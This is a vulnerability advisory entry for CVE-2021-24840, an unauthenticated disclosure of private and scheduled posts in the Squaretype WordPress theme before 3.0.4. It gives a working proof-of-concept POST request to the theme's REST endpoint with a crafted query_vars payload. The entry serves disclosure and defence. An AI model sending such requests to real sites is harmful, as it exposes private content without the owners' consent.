Squaretype Modern Blog < 3.0.4 – Unauthenticated Private/Schedule Posts Disclosure | CVE 2021-24840 | Theme Vulnerabilities

Description

The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.

Proof of Concept

POST /wp-json/csco/v1/more-posts
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d

Affects Themes

Fixed in 3.0.4

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Emil Kylander Edwartz

Submitter

Emil Kylander Edwartz

Submitter website

https://emilkylander.se

Submitter twitter

Verified

Yes

WPVDB ID

971302fd-4e8b-4c6a-818f-3a42c7fb83ef

Timeline

Publicly Published

2021-10-11 (about 2 years ago)

Added

2021-10-11 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2023-01-17

Title

WP FullCalendar < 1.5 - Unauthenticated Arbitrary Post Access

Published

2023-12-29

Title

WP User Profile Avatar < 1.0.1 - Author+ Avatar Deletion/Update via IDOR

Published

2024-03-28

Title

Molongui < 4.7.8 - Authenticated (Author+) Insecure Direct Object Reference

Published

2024-03-18

Title

Permalink Manager < 2.4.3.2 - Missing Authorization to Authenticated(Author+) arbitrary post slug modification

Published

2021-03-17

Title

BuddyPress < 7.2.1 - Force a Friendship